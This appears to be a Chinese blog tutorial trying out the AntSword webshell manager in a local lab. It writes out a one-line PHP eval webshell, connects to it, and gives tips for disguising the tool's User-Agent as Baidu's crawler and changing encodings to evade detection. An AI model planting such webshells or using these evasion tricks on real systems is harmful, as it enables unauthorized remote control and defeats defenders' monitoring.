PJzhang:蚁剑webshell管理工具试用

猫宁！！！

操作系统环境windows 7

官方文档

https://doc.u0u.us/zh-hans/index.html

https://github.com/AntSwordProject/AntSword-Loader（国外github地址）

https://gitee.com/AntSwordProject/AntSword-Loader（国内gitee地址）

https://github.com/AntSwordProject/AntSword-Loader/releases/download/4.0.3/AntSword-Loader-v4.0.3-win32-x64.zip（下载）

https://github.com/AntSwordProject/antSword（下载）

antSword-master.zip

AntSword-Loader-v4.0.3-win32-x64.zip

分别解压

进入AntSword-Loader-v4.0.3-win32-x64，运行AntSword.exe

初始化，加载antSword-master文件夹

再次运行AntSword.exe，可以正常使用了

分类目录添加分类

数据管理右键空白添加数据

phpstudy启动，在C:\phpstudy_pro\WWW目录下编写一个php小马

内容，命名为xiaozhupeiqi.php

<?php eval($_POST['xiaozhupeiqi']); ?>

http://192.168.43.241/xiaozhupeiqi.php

连接密码：xiaozhupeiqi

添加成功，右键有虚拟终端，文件管理，数据操作，浏览网站的功能

代理设置127.0.0.1 8081 http，burpsuite对应设置，可以通过测试抓取流量

默认UA User-Agent: antSword/v2.1

进入antSword-master\modules文件夹，找到request.js，update.js，以antSword关键词搜索

update.js的

  .set('User-Agent', "antSword/v2.0")

request.js的

const USER_AGENT = 'antSword/v2.1';

使用百度爬虫UA

Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)

在请求信息中心临时修改UA也是可以的，基础配置中有不同的编码可以尝试，以绕过拦截或者检测。

~~~